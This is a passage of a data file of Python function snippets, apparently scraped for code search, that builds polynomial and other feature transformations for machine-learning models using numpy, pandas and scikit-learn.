poly.fit_transform(np.nan_to_num(features_test.FLOWDAILY.astype(np.float32)).reshape(-1, 1))\n features_test['FCLOSEDAILY'] = poly.fit_transform(np.nan_to_num(features_test.FCLOSEDAILY.astype(np.float32)).reshape(-1, 1))\n features_test['FOPENHOURLY'] = poly.fit_transform(np.nan_to_num(features_test.FOPENHOURLY.astype(np.float32)).reshape(-1, 1))\n features_test['FHIGHHOURLY'] = poly.fit_transform(np.nan_to_num(features_test.FHIGHHOURLY.astype(np.float32)).reshape(-1, 1))\n features_test['FLOWHOURLY'] = poly.fit_transform(np.nan_to_num(features_test.FLOWHOURLY.astype(np.float32)).reshape(-1, 1))\n features_test['FCLOSEHOURLY'] = poly.fit_transform(np.nan_to_num(features_test.FCLOSEHOURLY.astype(np.float32)).reshape(-1, 1))\n features_test['FSMA200'] = poly.fit_transform(np.nan_to_num(features_test.FSMA200.astype(np.float32)).reshape(-1, 1))\n features_test['FBOLUP20'] = poly.fit_transform(np.nan_to_num(features_test.FBOLUP20.astype(np.float32)).reshape(-1, 1))\n features_test['FPP'] = poly.fit_transform(np.nan_to_num(features_test.FPP.astype(np.float32)).reshape(-1, 1))\n features_test['FS38'] = poly.fit_transform(np.nan_to_num(features_test.FS38.astype(np.float32)).reshape(-1, 1))\n features_test['FS62'] = 
poly.fit_transform(np.nan_to_num(features_test.FS62.astype(np.float32)).reshape(-1, 1))\n features_test['FS100'] = poly.fit_transform(np.nan_to_num(features_test.FS100.astype(np.float32)).reshape(-1, 1))\n features_test['FS138'] = poly.fit_transform(np.nan_to_num(features_test.FS138.astype(np.float32)).reshape(-1, 1))\n features_test['FR162'] = poly.fit_transform(np.nan_to_num(features_test.FS162.astype(np.float32)).reshape(-1, 1))\n features_test['FS200'] = poly.fit_transform(np.nan_to_num(features_test.FS200.astype(np.float32)).reshape(-1, 1))\n features_test['FR38'] = poly.fit_transform(np.nan_to_num(features_test.FR38.astype(np.float32)).reshape(-1, 1))\n features_test['FR62'] = poly.fit_transform(np.nan_to_num(features_test.FR62.astype(np.float32)).reshape(-1, 1))\n features_test['FR100'] = poly.fit_transform(np.nan_to_num(features_test.FR100.astype(np.float32)).reshape(-1, 1))\n features_test['FR138'] = poly.fit_transform(np.nan_to_num(features_test.FR138.astype(np.float32)).reshape(-1, 1))\n features_test['FR162'] = poly.fit_transform(np.nan_to_num(features_test.FR162.astype(np.float32)).reshape(-1, 1))\n features_test['FR200'] = poly.fit_transform(np.nan_to_num(features_test.FR200.astype(np.float32)).reshape(-1, 1))\n features_test['SBATR'] = poly.fit_transform(np.nan_to_num(features_test.SBATR.astype(np.float32)).reshape(-1, 1))\n\n features_oos['FEMA_21'] = poly.fit_transform(np.nan_to_num(features_oos.FEMA_21.astype(np.float32)).reshape(-1, 1))\n features_oos['FEMA_8'] = poly.fit_transform(np.nan_to_num(features_oos.FEMA_8.astype(np.float32)).reshape(-1, 1))\n features_oos['FADRLo'] = poly.fit_transform(np.nan_to_num(features_oos.FADRLo.astype(np.float32)).reshape(-1, 1))\n features_oos['FADRHi'] = poly.fit_transform(np.nan_to_num(features_oos.FADRHi.astype(np.float32)).reshape(-1, 1))\n features_oos['FRVI40'] = poly.fit_transform(np.nan_to_num(features_oos.FRVI40.astype(np.float32)).reshape(-1, 1))\n features_oos['FRVI60'] = poly.fit_transform(np.nan_to_num(features_oos.FRVI60.astype(np.float32)).reshape(-1, 1))\n features_oos['FONLOSMA5'] = poly.fit_transform(np.nan_to_num(features_oos.FONLOSMA5.astype(np.float32)).reshape(-1, 1))\n features_oos['FONHISMA5'] = poly.fit_transform(np.nan_to_num(features_oos.FONHISMA5.astype(np.float32)).reshape(-1, 1))\n features_oos['FONLOSMA21'] = poly.fit_transform(np.nan_to_num(features_oos.FONLOSMA21.astype(np.float32)).reshape(-1, 1))\n features_oos['FONHISMA21'] = poly.fit_transform(np.nan_to_num(features_oos.FONHISMA21.astype(np.float32)).reshape(-1, 1))\n features_oos['FONLOSMA34'] = poly.fit_transform(np.nan_to_num(features_oos.FONLOSMA34.astype(np.float32)).reshape(-1, 1))\n features_oos['FSBGAMMA'] = poly.fit_transform(np.nan_to_num(features_oos.FSBGAMMA.astype(np.float32)).reshape(-1, 1))\n features_oos['FOPENWEEKLY'] = poly.fit_transform(np.nan_to_num(features_oos.FOPENWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FHIGHWEEKLY'] = poly.fit_transform(np.nan_to_num(features_oos.FHIGHWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FLOWWEEKLY'] = poly.fit_transform(np.nan_to_num(features_oos.FLOWWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FCLOSEWEEKLY'] = poly.fit_transform(np.nan_to_num(features_oos.FCLOSEWEEKLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FOPENDAILY'] = poly.fit_transform(np.nan_to_num(features_oos.FOPENDAILY.astype(np.float32)).reshape(-1, 1))\n features_oos['FHIGHDAILY'] = poly.fit_transform(np.nan_to_num(features_oos.FHIGHDAILY.astype(np.float32)).reshape(-1, 1))\n 
features_oos['FLOWDAILY'] = poly.fit_transform(np.nan_to_num(features_oos.FLOWDAILY.astype(np.float32)).reshape(-1, 1))\n features_oos['FCLOSEDAILY'] = poly.fit_transform(np.nan_to_num(features_oos.FCLOSEDAILY.astype(np.float32)).reshape(-1, 1))\n features_oos['FOPENHOURLY'] = poly.fit_transform(np.nan_to_num(features_oos.FOPENHOURLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FHIGHHOURLY'] = poly.fit_transform(np.nan_to_num(features_oos.FHIGHHOURLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FLOWHOURLY'] = poly.fit_transform(np.nan_to_num(features_oos.FLOWHOURLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FCLOSEHOURLY'] = poly.fit_transform(np.nan_to_num(features_oos.FCLOSEHOURLY.astype(np.float32)).reshape(-1, 1))\n features_oos['FSMA200'] = poly.fit_transform(np.nan_to_num(features_oos.FSMA200.astype(np.float32)).reshape(-1, 1))\n features_oos['FBOLUP20'] = poly.fit_transform(np.nan_to_num(features_oos.FBOLUP20.astype(np.float32)).reshape(-1, 1))\n features_oos['FPP'] = poly.fit_transform(np.nan_to_num(features_oos.FPP.astype(np.float32)).reshape(-1, 1))\n features_oos['FS38'] = poly.fit_transform(np.nan_to_num(features_oos.FS38.astype(np.float32)).reshape(-1, 1))\n features_oos['FS62'] = poly.fit_transform(np.nan_to_num(features_oos.FS62.astype(np.float32)).reshape(-1, 1))\n features_oos['FS100'] = poly.fit_transform(np.nan_to_num(features_oos.FS100.astype(np.float32)).reshape(-1, 1))\n features_oos['FS138'] = poly.fit_transform(np.nan_to_num(features_oos.FS138.astype(np.float32)).reshape(-1, 1))\n features_oos['FR162'] = poly.fit_transform(np.nan_to_num(features_oos.FS162.astype(np.float32)).reshape(-1, 1))\n features_oos['FS200'] = poly.fit_transform(np.nan_to_num(features_oos.FS200.astype(np.float32)).reshape(-1, 1))\n features_oos['FR38'] = poly.fit_transform(np.nan_to_num(features_oos.FR38.astype(np.float32)).reshape(-1, 1))\n features_oos['FR62'] = poly.fit_transform(np.nan_to_num(features_oos.FR62.astype(np.float32)).reshape(-1, 1))\n features_oos['FR100'] = poly.fit_transform(np.nan_to_num(features_oos.FR100.astype(np.float32)).reshape(-1, 1))\n features_oos['FR138'] = poly.fit_transform(np.nan_to_num(features_oos.FR138.astype(np.float32)).reshape(-1, 1))\n features_oos['FR162'] = poly.fit_transform(np.nan_to_num(features_oos.FR162.astype(np.float32)).reshape(-1, 1))\n features_oos['FR200'] = poly.fit_transform(np.nan_to_num(features_oos.FR200.astype(np.float32)).reshape(-1, 1))\n features_oos['SBATR'] = poly.fit_transform(np.nan_to_num(features_oos.SBATR.astype(np.float32)).reshape(-1, 1))\n\n return(features,features_test,features_oos)", "def load_poly_features(df_train, df_test):\n logger = logging.getLogger(__name__)\n logger.debug('Loading polynomial features..')\n # Make a new dataframe for polynomial features\n poly_features = df_train[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3', 'DAYS_BIRTH']]\n poly_features_test = df_test[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3', 'DAYS_BIRTH']]\n\n # imputer for handling missing values\n imputer = Imputer(strategy='median')\n\n # Need to impute missing values\n poly_features = imputer.fit_transform(poly_features)\n poly_features_test = imputer.transform(poly_features_test)\n\n # Create the polynomial object with specified degree\n poly_transformer = PolynomialFeatures(degree=3)\n # Train the polynomial features\n poly_transformer.fit(poly_features)\n\n # Transform the features\n poly_features = poly_transformer.transform(poly_features)\n poly_features_test = 
poly_transformer.transform(poly_features_test)\n logger.debug('Polynomial Features shape: %s' % str(poly_features.shape))\n\n df_poly_features = pd.DataFrame(poly_features,\n columns=poly_transformer.get_feature_names(['EXT_SOURCE_1', 'EXT_SOURCE_2',\n 'EXT_SOURCE_3', 'DAYS_BIRTH']))\n df_poly_features_test = pd.DataFrame(poly_features_test,\n columns=poly_transformer.get_feature_names(['EXT_SOURCE_1', 'EXT_SOURCE_2',\n 'EXT_SOURCE_3', 'DAYS_BIRTH']))\n df_poly_features['SK_ID_CURR'] = df_train['SK_ID_CURR']\n df_poly_features_test['SK_ID_CURR'] = df_test['SK_ID_CURR']\n logger.info('Loaded polynomial features')\n return df_poly_features, df_poly_features_test", "def transform_data(features):\n\n def cart2pol(my_row):\n x = my_row[0]\n y = my_row[1]\n rho = np.sqrt(x**2 + y**2)\n phi = np.arctan2(y, x)\n return [rho, phi]\n\n #vfunc = np.vectorize(cart2pol)\n #transformed = vfunc(features)\n out = []\n #print(features, \"\\n\\n\")\n for row in features:\n out.append(cart2pol(row))\n out = np.array(out)\n #print(\"out is\\n\", out)\n \"\"\"\n x = out[:,0]\n y = out[:,1]\n \n plt.scatter(x,y)\n plt.show()\n \"\"\"\n return out", "def generate_coefficients_data(poly_degree: int, performance_data: pd.DataFrame, param_columns: typing.List) -> pd.DataFrame:\n if poly_degree != 2:\n logging.warning('Not Implemented: polynomial degree of > 2. Will use degree 2 for meta-model')\n coef_names = get_coefficient_names()\n results = []\n for idx, task_id in enumerate(performance_data['task_id'].unique()):\n frame_task = performance_data.loc[performance_data['task_id'] == task_id]\n model = sklearn.linear_model.LinearRegression(fit_intercept=False)\n poly_feat = sklearn.preprocessing.PolynomialFeatures(2)\n X = poly_feat.fit_transform(frame_task[param_columns])\n y = frame_task['predictive_accuracy']\n model.fit(X, y)\n result = {\n 'task_id': task_id,\n coef_names[0]: model.coef_[0],\n coef_names[1]: model.coef_[1],\n coef_names[2]: model.coef_[2],\n coef_names[3]: model.coef_[3],\n coef_names[4]: model.coef_[4],\n coef_names[5]: model.coef_[5],\n }\n results.append(result)\n return pd.DataFrame(results).set_index('task_id')", "def predict(self, X) :\n if self.coef_ is None :\n raise Exception(\"Model not initialized. 
Perform a fit first.\")\n\n X = self.generate_polynomial_features(X) # map features\n\n ### ========== TODO : START ========== ###\n # part c: predict y\n # for this we first get the single value of feature vector, then X in the transposed form and then we have to multiply by Theta\n\n y = np.dot(X, self.coef_)#coef is the coef matrix\n ### ========== TODO : END ========== ###\n\n\n return y", "def expand_features(x, degree):\n N = x.shape[0]\n D = x.shape[1]\n \n # Matrix to be returned\n phi = np.ones((N, 1))\n # Holds X^deg\n xdeg = np.ones((N, D))\n for deg in range (1,degree+1) :\n xdeg *= x\n phi = np.c_[phi, xdeg] \n \n return phi", "def build_poly(x, degree): \n # ***************************************************\n # COPY YOUR CODE FROM EX03 HERE\n # polynomial basis function: TODO\n # this function should return the matrix formed\n # by applying the polynomial basis to the input data\n # ***************************************************\n raise NotImplementedError", "def build_poly(x, degree):\n \n X = np.vander((x[:,0]).T, degree+1, increasing=True)\n \n for i in range(1,np.shape(x)[1],1):\n feat = (x[:,i]).T\n vander = np.vander(feat, degree+1, increasing=True)\n #remove the column of 1 at the beginning of each vander\n vander = np.delete(vander, 0,axis = 1)\n #concatenation\n X = np.concatenate((X, vander), axis=1)\n \n return X", "def build_poly(x, degree):\n phi = np.ones(len(x))\n phi = np.vstack((phi, [x**(j+1) for j in range(degree)]))\n \n return phi.T", "def polynomial_variables(self):\n return self._polynomial_variables", "def poly_regression(self,precision=8):\n # return empty lists if input is empty\n if self.training == []:\n return [],[]\n\n latitudes = []\n longitudes = []\n for point in self.training[:-1]:\n latitudes.append(point[0])\n longitudes.append(point[1]) \n # store everything in a dataframe\n latDf = pd.DataFrame(numpy.array(latitudes), columns=['latitudes'])\n longDf = pd.DataFrame(numpy.array(longitudes), columns=['longitudes'])\n\n # learn how to do regression\n reg = linear_model.LinearRegression()\n\n # pass the order of your polynomial here \n poly = PolynomialFeatures(precision)\n\n \n # regression with latitude as domain\n vertical_predicted_path = []\n transform = poly.fit_transform(longDf)\n\n reg.fit(transform,latDf)\n predictions = reg.predict(transform)\n\n for i in range(len(predictions)):\n vertical_predicted_path.append([predictions[i][0],longDf[\"longitudes\"][i]])\n\n \n # regression with longitude domain\n horizontal_predicted_path = []\n transform = poly.fit_transform(latDf)\n\n reg.fit(transform,longDf)\n predictions = reg.predict(transform)\n\n for i in range(len(predictions)):\n horizontal_predicted_path.append([latDf[\"latitudes\"][i], predictions[i][0]])\n\n self.horizontal = sorted(horizontal_predicted_path, key=lambda k: [k[1], k[0]])\n self.vertical = sorted(vertical_predicted_path, key=lambda k: [k[0], k[1]])\n \n # return sorted horizontal and vertical prediction\n return self.horizontal, self.vertical", "def build_poly(x, degree):\n tx = np.zeros((x.shape[0], x.shape[1]*(degree+1)))\n \n for j in range(degree+1):\n tx[:,x.shape[1]*j:x.shape[1]*(j+1)] = np.power(x,j)\n \n return tx", "def __getPolynomial(self) -> 'func':\n return lambda x: sum(self.pts[i]*base(x)\n for i, base in enumerate(self.basis))", "def get_conv_features(self, X):\n convfeatures = blah\n return convfeatures", "def feature_map(self, x):\n if not self.use_resnet:\n return self.features(x)\n x = self.features.conv1(x)\n x = self.features.bn1(x)\n x = 
self.features.relu(x)\n x = self.features.maxpool(x)\n c2 = self.features.layer1(x)\n c3 = self.features.layer2(c2)\n c4 = self.features.layer3(c3)\n return c4", "def yy(x):\r\n return Feature(x, \"YY\")", "def zz(x):\r\n return Feature(x, \"ZZ\")", "def _create_ploynomial_array(self, coeff, x):\n xarr = numpy.array(x)\n yarr = numpy.zeros(len(xarr))\n for idim in range(len(coeff)):\n ai = coeff[idim]\n yarr += ai*xarr**idim\n return yarr", "def _transform_fn(features, mode):\n\t\tprint('Before feature transform_fn')\n\t\tfor k in features:\n\t\t\tprint(features[k].shape)\n\t\tcontext_features, example_features = feature_lib.encode_listwise_features(\n\t\t\t\tfeatures,\n\t\t\t\tinput_size=input_size,\n\t\t\t\tcontext_feature_columns=context_feature_columns,\n\t\t\t\texample_feature_columns=example_feature_columns,\n\t\t\t\tmode=mode)\n\t\tprint('After feature transform_fn')\n\t\tfor k in example_features:\n\t\t\tprint(k)\n\t\t\tprint(example_features[k].shape)\n\t\tfor k in context_features:\n\t\t\tprint(k)\n\t\t\tprint(context_features[k].shape)\n\t\treturn context_features, example_features", "def get_poly_fun(fun: XFunction, x: float, degree: int) -> Poly:\n params = get_poly_params(fun, x, degree)\n return Poly(params)", "def get_polyfit_function(self):\n N = len(self.coefficients)\n return lambda x: np.dot( self.get_poly(x).T , self.coefficients.reshape(N, 1) )", "def forward(self, x):\n x = self.features(x)\n return x", "def add_poly_features(data, columns, degree=2):\n\n if degree != 2:\n print('Only works w/2 degrees right now...')\n return\n\n for col in columns:\n new_col = col + '_poly' + str(degree)\n data[new_col] = np.nan\n data[[col, new_col]] = poly(data[col], degree=degree)\n\n return data", "def get_poly_coeff(self, independent, dependent):\n\n try:\n x = self.df_input[[independent]]\n y = self.df_input[[dependent]]\n\n poly = PolynomialFeatures(degree = 2)\n x_poly = poly.fit_transform(x) \n\n model = LinearRegression()\n model.fit(x_poly, y)\n return model.coef_\n except Exception as e:\n print(e)", "def construct_polynomial_approx(degree, weights):\n # here is a function that is created on the fly from the input feature\n # mapping and weights\n def prediction_function(xs):\n expanded_xs = np.matrix(expand_to_monomials(xs, degree))\n ys = expanded_xs*np.matrix(weights).reshape((len(weights),1))\n return np.array(ys).flatten()\n # we return the function reference (handle) itself. 
This can be used like\n # any other function\n return prediction_function", "def transform(self, X):\n\n # Calculate and store in features, replacing any potential non-finites (not sure needed)\n if self.split is None:\n features = _trial(self, self.study.best_trial, X)\n else:\n features = _trial(self, self.study.trials[self.study.top_trial], X)\n return features", "def transform(self, X: Tensor) -> Tensor:\n return X[..., self.feature_indices]", "def multiply(self, P):\n if self.getDegree() == -1 or P.getDegree() == -1:\n return Polynomial([])\n \n coefs_of_product = [0] * (self.getDegree() + P.getDegree() + 1)\n for i in range(self.getDegree() + 1):\n for j in range(P.getDegree() + 1):\n coefs_of_product[i + j] += self.__coefficients[i] * P.__coefficients[j]\n return Polynomial(coefs_of_product)", "def create_feature(example):\n input_ids, label_ids = encode_fn(\n example['tokens'], example['labels'])\n\n features = {\n 'input_ids': int64_feature(input_ids),\n 'label_ids': int64_feature(label_ids)\n }\n\n return features", "def get_pipeline(features, to_matrix=True):\n feature_names = []\n for feature in features:\n feature_names += feature[1].FEATS\n if to_matrix:\n return Pipeline(features + [('transform', ToMatrix(features=feature_names)), ('norm', MinMaxScaler())])\n else:\n return Pipeline(features)", "def generate_polynomial():\n degree = numpy.random.choice(range(3, 7))\n x = numpy.linspace(-10, 10, 1000)\n coefficients = numpy.random.chisquare(3, size=degree) + 1\n coefficients *= numpy.random.choice([-1, 1], size=coefficients.shape)\n coefficients *= 0.5\n y = numpy.polyval(coefficients, x)\n add_noise(y, 0.1)\n return x, y", "def zzX_from_poly(f):\n if f.is_univariate:\n return zzx_from_poly(f)\n else:\n return zzX_from_dict(dict(zip(f.monoms, f.coeffs)), len(f.symbols))", "def extract_features(input_feature_map, points=conv43Points):\n arr = []\n for y,x in points:\n arr.append(input_feature_map[:,y,x,:])\n return tf.stack(arr, axis=1, name=\"extracted_features\"), len(points)", "def transform(self, Xnew):\n\n ProjXnew = [X.dot(self.W) for X in Xnew]\n return ProjXnew", "def features(x):\n # We need to contract last axis of x with first of W - do this with\n # tensordot. 
The result has shape:\n # (?, ?, num_random_features)\n return jnp.sqrt(2 / num_random_features) * jnp.cos(\n jnp.sqrt(2 / gamma) * jnp.tensordot(x, w, axes=1) + b)", "def poly_features(frames, sample_rate, *, kwargs={}):\n l = []\n for frame in frames:\n l.append(\n np.mean(\n librosa.feature.poly_features(\n y=frame,\n sr=sample_rate,\n **kwargs\n ).T, axis=0\n )\n )\n return np.array(l)", "def pipeline(self):\n\n transformers = []\n\n custom = self.CustomFeature()\n #transformers.append(('custom', custom))\n n_features = int(self.n_features/2)\n\n #kbest = SelectKBest(score_func=chi2, k=n_features)\n #transformers.append(('kbest', kbest))\n\n # pca = PCA(n_components=n_features, svd_solver='randomized', whiten=True)\n # transformers.append(('pca', pca))\n\n if self.definer.problem_type == 'classification':\n extraTC = SelectFromModel(ExtraTreesClassifier(criterion='entropy'))\n else:\n extraTC = SelectFromModel(ExtraTreesRegressor())\n\n transformers.append(('extraTC', extraTC))\n\n #scaler = StandardScaler()\n #transformers.append(('scaler', scaler))\n #binarizer = Binarizer()\n return FeatureUnion(transformers)", "def polydecode(ctx, inputfile, output, x):\n with rio.open(inputfile) as src:\n metaprof = src.profile.copy()\n data = src.read()\n\n depth, rows, cols = data.shape\n\n depth -= 1\n\n out = (\n np.sum(\n np.dstack(\n [p * x ** abs(depth - d) for p, d in zip(data, range(depth))]\n ),\n axis=2,\n )\n + data[-1]\n ).astype(np.float32)\n\n metaprof.update(dtype=np.float32, count=1)\n\n with rio.open(output, \"w\", **metaprof) as dst:\n dst.write(out, 1)", "def build_poly(tx, degree) :\n shape = tx.shape\n poly = np.zeros((shape[0], shape[1] * degree))\n poly[:,:shape[1]] = tx\n for deg in range(2, degree + 1) :\n for j in range(0, shape[1]) :\n poly[:, shape[1] * (deg - 1) + j] = tx[:,j] ** deg\n return poly", "def build_feature_transform():\n\n # These features can be parsed as numeric.\n numeric = HEADER.as_feature_indices(\n [\"review_count\", \"lat\", \"lng\", \"lat2\", \"lng2\"]\n )\n\n # These features contain a relatively small number of unique items.\n categorical = HEADER.as_feature_indices(\n [\"distance\", \"price_level\", \"review_count\", \"Sp1\", \"type\"]\n )\n\n # These features can be parsed as natural language.\n text = HEADER.as_feature_indices(\n [\n \"slug\", \"menu\", \"slug.1\", \"categories\", \"name\", \"url\", \"homeurl\",\n \"resource_id1\", \"resource_id2\"\n ]\n )\n\n numeric_processors = Pipeline(steps=[(\"robustimputer\", RobustImputer())])\n\n categorical_processors = Pipeline(\n steps=[\n (\"thresholdonehotencoder\", ThresholdOneHotEncoder(threshold=162))\n ]\n )\n\n text_processors = Pipeline(\n steps=[\n (\n \"multicolumntfidfvectorizer\",\n MultiColumnTfidfVectorizer(\n max_df=0.9977,\n min_df=0.0003137465824032988,\n analyzer=\"word\",\n max_features=10000\n )\n )\n ]\n )\n\n column_transformer = ColumnTransformer(\n transformers=[\n (\"numeric_processing\", numeric_processors, numeric\n ), (\"categorical_processing\", categorical_processors,\n categorical), (\"text_processing\", text_processors, text)\n ]\n )\n\n return Pipeline(\n steps=[\n (\"column_transformer\",\n column_transformer), (\"robustpca\", RobustPCA(n_components=88)),\n (\"robuststandardscaler\", RobustStandardScaler())\n ]\n )", "def extract_features(X):\n X = X.drop(\"PassengerId\", axis=1)\n X = X.drop(\"Ticket\", axis=1)\n X = X.drop(\"Cabin\", axis=1)\n \n # Adding polynomial features\n X[\"Age2\"] = X[\"Age\"] ** 2\n #X[\"Fare2\"] = X[\"Fare\"] ** 2\n #X[\"Pclass2\"] = 
X[\"Pclass\"] ** 2\n\n \n male_titles = set([\"Mr\", \"Don\", \"Sir\"])\n female_titles = set([\"Miss\", \"Ms\", \"Mrs\", \"Mme\", \"Mdm\", \"Lady\"])\n professionals = set([\"Dr\", \"Rev\", \"Master\"])\n military = set([\"Col\", \"Major\", \"Capt\"])\n royalty = set([\"the Countess\", \"Jonkheer\"])\n \n names = X[\"Name\"]\n for i in range(len(names)): \n name_tokens = names[i].split(\", \") \n passenger_title = name_tokens[1].split(\".\")[0]\n if passenger_title in male_titles:\n names[i] = 1\n elif passenger_title in female_titles:\n names[i] = 2\n elif passenger_title in professionals:\n names[i] = 3\n #elif passenger_title in royalty:\n # names[i] = 4\n elif passenger_title in military:\n names[i] = 5\n else:\n names[i] = 6\n \n X[\"Name\"].update(names)\n \n # One hot encoding of categorical data\n X = pd.get_dummies(X) \n \n X.fillna(0, inplace=True)\n X['Fam'] = X['SibSp'] + X['Parch'] # assigned to a column\n return X", "def xx(x):\r\n return Feature(x, \"XX\")", "def zzX_eval(f, x):\n if hasattr(x, '__iter__'):\n return zzX_eval_list(f, x)\n\n if poly_univariate_p(f):\n return zzx_eval(f, x)\n\n if not x:\n return poly_TC(f)\n\n result = poly_LC(f)\n\n for coeff in f[1:]:\n result = zzX_mul_const(result, x)\n result = zzX_add(result, coeff)\n\n return result", "def construct_poly(data, power):\n return np.power(data, power)", "def get_poly_params(fun: XFunction, x: float, degree: int) -> tuple[float, ...]:\n if degree < 0:\n return (0.0,)\n rhs = np.array([fun(x, order=i) for i in range(degree, -1, -1)])\n mat = np.zeros((degree + 1, degree + 1))\n for i in range(degree + 1):\n for j in range(i + 1):\n mat[i, j] = factorial(degree - j) / factorial(i - j) * x ** (i - j)\n return tuple(np.linalg.solve(mat, rhs))", "def map_feature(X1, X2):\n X1 = np.atleast_1d(X1)\n X2 = np.atleast_1d(X2)\n degree = 6\n out = []\n for i in range(1, degree+1):\n for j in range(i + 1):\n out.append((X1**(i-j) * (X2**j)))\n return np.stack(out, axis=1)", "def extract_features(self, inputs):\n x = self.conv1(inputs)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n return x", "def transform(self, X):\n featurizers = [self.featurizer1, self.featurizer2, self.featurizer3, self.featurizer4, self.featurizer5,\n self.featurizer6, self.featurizer7, self.featurizer8, self.featurizer9, self.featurizer10]\n fvs = []\n for datum in X:\n [fv] = [f(datum) for f in featurizers if f is not None]\n fvs.append(fv)\n return np.array(fvs).astype(float)", "def construct_target(trainSamples):\n feature_names = [\"click_bool\", \"booking_bool\",\"position\"]\n samples = trainSamples[feature_names].values\n def f(vec):\n x, y, z = vec\n return y + 0.2 * x\n return [f(vec) for vec in samples]", "def getFeatures(featureInput):\n featureList = []\n for defTerm,candidateSent in featureInput:\n tokens = nltk.word_tokenize(candidateSent)\n features = {}\n POScenter,POSleft,POSright = wordPOS(tokens,defTerm)\n features['Pos of first Article'] = posFirstArticle(tokens)\n## features['Num Punct Marks'] = numPunctuation(tokens)\n features['Subj words Predicate'] = subWordPerdicate(candidateSent,defTerm,tokens)\n features['Word before def term'] = wordBeforeDef(tokens,defTerm)\n features['POS centered word'] = POScenter\n features['POS left word'] = POSleft\n## features['POS right word'] = POSright \n featureList.append(features)\n return featureList", "def generate_models(x, y, degs):\n import numpy as np\n rslt = 
[]\n for deg in degs:\n coefs = np.polyfit(x, y, deg)\n rslt.append(coefs)\n return rslt", "def generate_random_tropical_poly(max_degree, min_coefficient, max_coefficient):\n coefficients = []\n for d in range(0, random.randint(1, max_degree) + 1):\n coefficients.append(random.randint(min_coefficient, max_coefficient))\n return coefficients", "def get_model_feature(\n model,\n batch_x\n):\n features = model.get_feature(batch_x, training=False)\n return features", "def to_features(self):\n to_return = dict()\n\n to_return['bias'] = 1.0\n to_return['user:' + self.user] = 1.0\n to_return['format:' + self.format] = 1.0\n to_return['token:' + self.token.lower()] = 1.0\n\n to_return['part_of_speech:' + self.part_of_speech] = 1.0\n for morphological_feature in self.morphological_features:\n to_return['morphological_feature:' + morphological_feature] = 1.0\n to_return['dependency_label:' + self.dependency_label] = 1.0\n\n return to_return", "def transform(self, X):\n featurizers = [self.featurizer1, self.featurizer2, self.featurizer3, self.featurizer4, self.featurizer5,\n self.featurizer6, self.featurizer7, self.featurizer8, self.featurizer9, self.featurizer10]\n fvs = []\n for datum in X:\n fv = [f(datum) for f in featurizers if f is not None]\n fvs.append(fv)\n return np.array(fvs).astype(float)", "def get_predicts(x_matrix, model, poly, scale, dummy_idx):\n x_matrix = np.array(x_matrix)\n\n # adding polynomial features and/or scaling before prediction\n temp_list = split_poly_scale_join([x_matrix], dummy_idx, poly, scale)\n x_matrix = temp_list[0]\n\n return model.predict(x_matrix)", "def preprocess_features(features):\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features).tocoo()\n return sparse_to_tensor(features)", "def poly_regression_cubic(X, Y, Xs_test, Ys_test):\n \n poly = PolynomialFeatures(degree = 3)\n X3 = poly.fit_transform(X)[:,1:]\n X3_test = []\n for X_test in Xs_test:\n X3_test.append(poly.fit_transform(X_test)[:,1:])\n mses = linear_regression(X3, Y, X3_test, Ys_test)\n return mses", "def poly(x, degree=2):\n x = np.array(x)\n X_trans = np.transpose(np.vstack((x**k for k in range(degree + 1))))\n return np.linalg.qr(X_trans)[0][:, 1:]", "def preprocess_features(features):\r\n rowsum = np.array(features.sum(1),dtype='float')\r\n r_inv = np.power(rowsum, -1).flatten()\r\n r_inv[np.isinf(r_inv)] = 0.\r\n r_mat_inv = sp.diags(r_inv)\r\n features = r_mat_inv.dot(features)\r\n # return sparse_to_tuple(features)\r\n return features\r\n # print(features)\r\n # rowsum = np.array(features.sum(1),dtype='float')\r\n #\r\n # r_inv = np.power(rowsum, -1).flatten()\r\n # r_inv[np.isinf(r_inv)] = 0.\r\n # r_mat_inv = np.diag(r_inv)\r\n # features = r_mat_inv.dot(features)\r\n # # return sparse_to_tuple(features)\r\n # return features\r", "def compute_features(self, X):\n F = self.feature_extractor(X)\n if self.with_dropout:\n F = self.dropout(F)\n F = F[:, None].expand(-1, self.n_primitives, -1)\n F = torch.cat([\n F,\n self.primitive_embedding[None].expand_as(F)\n ], dim=-1)\n\n B = F.shape[0]\n M = self.n_primitives\n D = 2*self.feature_extractor.feature_size\n\n assert F.shape == (B, M, D)\n return F", "def getXy_by_features(year, features, sex, age = None):\r\n print 'getXy_by_features(year=%d,features=%s,sex=%s,age=%s)' % (year, features, sex, age)\r\n \r\n X,y,keys = getXy_by_features_(year, features)\r\n X,y,keys = getXy_by_sex_age(X,y,keys, sex, age)\r\n X,y = 
normalize(X, y)\r\n\r\n return X,y,keys", "def get_coeffs(self):\n\n return self._coeff_to_dict()", "def generateFeatures(self, data):\n pass", "def get_training(feature_path): \n features = np.loadtxt(feature_path)\n feature_size = features.shape[1] -1 \n features_in = features[:,0:feature_size]\n features_out = features[:,-1]\n #features_out = np.array(map(lambda x: x if x else 0, features_out_unnorm))\n return features_in, features_out", "def preprocess_features(features):\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n return features.todense()", "def feature_mapping(x, y, power, as_ndarray=False):\n # data = {}\n # # inclusive\n # for i in np.arange(power + 1):\n # for p in np.arange(i + 1):\n # data[\"f{}{}\".format(i - p, p)] = np.power(x, i - p) * np.power(y, p)\n\n data = {\"f{}{}\".format(i - p, p): np.power(x, i - p) * np.power(y, p)\n for i in np.arange(power + 1)\n for p in np.arange(i + 1)\n }\n\n if as_ndarray:\n return 